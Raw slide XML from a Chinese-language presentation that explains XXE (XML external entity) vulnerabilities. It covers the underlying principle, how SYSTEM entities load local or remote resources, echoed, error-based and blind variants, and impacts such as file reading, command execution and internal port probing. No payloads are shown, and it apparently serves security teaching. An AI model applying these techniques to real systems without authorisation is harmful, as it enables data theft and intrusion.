            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>）攻击的原理是利用应用程序在解析</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文件时，未正确过滤外部实体的引用，导致攻击者可以向应用程序注入恶意数据，并利用该漏洞实现各种攻击目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>具体来说，</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攻击利用了</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解析器中处理外部实体引用时的一个特性：外部实体可以从本地系统或远程位置动态加载。攻击者可以构造恶意的</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文档，其中包含指向外部资源（如本地文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>等）的实体引用，并将该文档提交给受害者程序解析。当程序尝试解析文档并读取实体内容时，攻击者就可以向受害者程序中注入自己的代码或获得敏感信息，甚至可能控制整个系统。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543646" y="1230082"/>
            <a:ext cx="4311444" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>原理</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688946" y="345014"/>
            <a:ext cx="2804633" cy="756108"/>
            <a:chOff x="4688946" y="345014"/>
            <a:chExt cx="2804633" cy="756108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4688946" y="345014"/>
              <a:ext cx="2804633"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XXE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>漏洞原理</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3" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502511" y="1829306"/>
            <a:ext cx="7714707" cy="2951193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>有些</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文档包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>标识符定义的“实体”，这些</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文档会在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DOCTYPE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>头部标签中呈现。这些定义的’实体’能够访问本地或者远程的内容。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>关键字‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>’会令</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解析器从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>中读取内容，并允许它在</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文档中被替换。因此，攻击者可以通过实体将他自定义的值发送给应用程序，强制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>解析器去访问攻击者指定的资源内容（可能是系统上本地文件亦或是远程系统上的文件）。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2543646" y="1230082"/>
            <a:ext cx="4311444" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>原理</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688946" y="345014"/>
            <a:ext cx="2804633" cy="756108"/>
            <a:chOff x="4688946" y="345014"/>
            <a:chExt cx="2804633" cy="756108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4688946" y="345014"/>
              <a:ext cx="2804633"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XXE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>漏洞原理</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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986628" y="4805196"/>
            <a:ext cx="4113608" cy="16454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862307" y="1741957"/>
            <a:ext cx="8797548" cy="4197688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>正常回显</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>正常回显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是最传统的</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在利用过程中服务器会直接回显信息，可直接完成</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a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>报错</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是回显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攻击的一种特例</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它与正常回显</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的不同在于它在利用过程中服务器回显的是错误信息，可根据错误信息的不同判断是否注入成功。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入时无法直接获得目标系统的响应结果，而是需要使用其他技术方法才能验证漏洞是否存在以及攻击是否成功。攻击者可以通过调用其他服务端点或查看日志等方式来判断 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入是否成功。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1799599" y="1028097"/>
            <a:ext cx="4311444" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4688946" y="345014"/>
            <a:ext cx="2804633" cy="756108"/>
            <a:chOff x="4688946" y="345014"/>
            <a:chExt cx="2804633" cy="756108"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="文本框 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4688946" y="345014"/>
              <a:ext cx="2804633"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XXE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>漏洞原理</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20514" y="1230082"/>
            <a:ext cx="1916911" cy="2153178"/>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rgbClr val="B9998D"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:no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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2947618" y="2272084"/>
            <a:ext cx="7326919" cy="2116285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2780311" y="1782006"/>
            <a:ext cx="4311444" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞危害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="523035" y="1753302"/>
            <a:ext cx="422568" cy="416117"/>
            <a:chOff x="7197121" y="8332916"/>
            <a:chExt cx="553830" cy="543285"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Freeform 31"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7197121" y="8332916"/>
              <a:ext cx="553830" cy="543285"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 276915 w 462"/>
                <a:gd name="T1" fmla="*/ 0 h 453"/>
                <a:gd name="T2" fmla="*/ 276915 w 462"/>
                <a:gd name="T3" fmla="*/ 0 h 453"/>
                <a:gd name="T4" fmla="*/ 0 w 462"/>
                <a:gd name="T5" fmla="*/ 266246 h 453"/>
                <a:gd name="T6" fmla="*/ 276915 w 462"/>
                <a:gd name="T7" fmla="*/ 542086 h 453"/>
                <a:gd name="T8" fmla="*/ 552631 w 462"/>
                <a:gd name="T9" fmla="*/ 266246 h 453"/>
                <a:gd name="T10" fmla="*/ 276915 w 462"/>
                <a:gd name="T11" fmla="*/ 0 h 453"/>
                <a:gd name="T12" fmla="*/ 276915 w 462"/>
                <a:gd name="T13" fmla="*/ 478523 h 453"/>
                <a:gd name="T14" fmla="*/ 276915 w 462"/>
